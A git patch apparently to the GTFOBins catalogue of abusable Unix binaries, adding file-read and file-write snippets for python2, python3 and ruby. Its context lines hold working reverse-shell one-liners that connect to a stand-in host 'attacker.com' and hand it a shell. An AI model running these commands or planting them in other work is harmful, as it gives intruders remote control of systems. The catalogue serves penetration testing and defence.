From ee57eeba90c7e0ab8b6f0f72d34f1a75d95a2425 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Mon, 28 May 2018 18:25:55 +0100 Subject: [PATCH] Add read and write to python and ruby --- _gtfobins/python2.md | 4 ++++ _gtfobins/python3.md | 4 ++++ _gtfobins/ruby.md | 4 ++++ 3 files changed, 12 insertions(+) diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 1b64190..d2cfa3d 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -28,6 +28,10 @@ functions: export RHOST=attacker.com export RPORT=12345 python2 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + file-read: + - code: python2 -c 'open("file_to_read").read()' + file-write: + - code: python2 -c 'open("file_to_write","w+").write("data")' load-library: - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' --- diff --git a/_gtfobins/python3.md b/_gtfobins/python3.md index 9342130..3db6232 100644 --- a/_gtfobins/python3.md +++ b/_gtfobins/python3.md @@ -28,6 +28,10 @@ functions: export RHOST=attacker.com export RPORT=12345 python3 -c 'import sys,socket,os,pty;s=socket.socket(); s.connect((os.getenv("RHOST"),int(os.getenv("RPORT")))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn("/bin/sh")' + file-read: + - code: python3 -c 'open("file_to_read").read()' + file-write: + - code: python3 -c 'open("file_to_write","w+").write("data")' load-library: - code: python3 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' --- diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md index 8335338..0935dc3 100644 --- a/_gtfobins/ruby.md +++ b/_gtfobins/ruby.md @@ -15,6 +15,10 @@ functions: export RHOST=attacker.com export RPORT=12345 ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + file-read: + - code: ruby -e 'puts File.read("file_to_read")' + file-write: + - code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }' load-library: - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")' ---